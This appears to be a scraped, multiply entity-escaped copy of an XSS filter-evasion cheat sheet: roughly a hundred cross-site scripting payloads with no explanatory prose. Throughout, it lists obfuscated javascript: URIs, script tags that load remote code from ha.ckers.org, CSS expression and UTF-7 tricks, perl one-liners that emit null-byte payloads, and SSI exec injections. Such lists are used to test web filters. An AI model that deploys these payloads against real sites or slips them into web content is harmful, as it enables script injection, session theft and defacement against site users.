&amp;amp;lt;IMG SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;SCR\0IPT&amp;amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;lt;/SCR\0IPT&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY onload!#$%&amp;amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;amp;lt;B&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;amp;lt;&lt;br /&gt;
&amp;amp;lt;SCRIPT&amp;amp;gt;a=/XSS/\nalert(a.source)&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;/TITLE&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;BODY ONLOAD=alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/LAYER&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;STYLE&amp;amp;gt;@import'http://ha.ckers.org/xss.css';&amp;amp;lt;/STYLE&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;amp;lt;http://ha.ckers.org/xss.css&amp;amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;UL&amp;amp;gt;&amp;amp;lt;LI&amp;amp;gt;XSS&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IFRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/IFRAME&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;FRAMESET&amp;amp;gt;&amp;amp;lt;FRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/FRAMESET&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE&amp;amp;gt;&amp;amp;lt;TD BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(&amp;amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)';&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG STYLE=&amp;quot;&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;exp/*&amp;amp;lt;A STYLE='no\xss:noxss(&amp;quot;&amp;quot;*//*&amp;quot;&amp;quot;);xss:ex/*XSS*//*/*/pression(alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;))'&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE TYPE=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;alert('XSS');&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;.XSS{background-image:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;A CLASS=XSS&amp;amp;gt;&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE type=&amp;quot;&amp;quot;text/css&amp;quot;&amp;quot;&amp;amp;gt;BODY{background:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;!--[if gte IE 4]&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS');&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;![endif]--&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BASE HREF=&amp;quot;&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;OBJECT TYPE=&amp;quot;&amp;quot;text/x-scriptlet&amp;quot;&amp;quot; DATA=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;amp;gt;&amp;amp;lt;param name=url value=javascript:alert('XSS')&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.swf&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot;&amp;quot; type=&amp;quot;&amp;quot;image/svg+xml&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML&amp;amp;gt;&amp;amp;lt;BODY&amp;amp;gt;&amp;amp;lt;?xml:namespace prefix=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; ns=&amp;quot;&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;#default#time2&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;t:set attributeName=&amp;quot;&amp;quot;innerHTML&amp;quot;&amp;quot; to=&amp;quot;&amp;quot;XSS&amp;amp;lt;SCRIPT DEFER&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/BODY&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo '&amp;amp;lt;SCR'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;? echo('&amp;amp;lt;SCR)';echo('IPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;');&amp;amp;nbsp;?&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Set-Cookie&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;USERID=&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS')&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HEAD&amp;amp;gt;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;CONTENT-TYPE&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;quot;&amp;amp;gt; &amp;amp;lt;/HEAD&amp;amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT =&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; '' SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT &amp;quot;&amp;quot;a='&amp;amp;gt;'&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=`&amp;amp;gt;` SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT&amp;amp;gt;document.write(&amp;quot;&amp;quot;&amp;amp;lt;SCRI&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;PT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://66.102.7.147/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://1113982867/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;h\ntt\tp://6&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//www.google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//google&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.google.com./&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;input type=&amp;quot;&amp;quot;image&amp;quot;&amp;quot; dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;bgsound src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;link rel=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; href=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;iframe src=&amp;quot;&amp;quot;vbscript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;livescript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;about:&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;meta http-equiv=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; content=&amp;quot;&amp;quot;0;url=javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;body onload=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;background-image: url(javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;width: expression(document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style type=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/style&amp;amp;gt;&amp;quot;&lt;br /&gt;
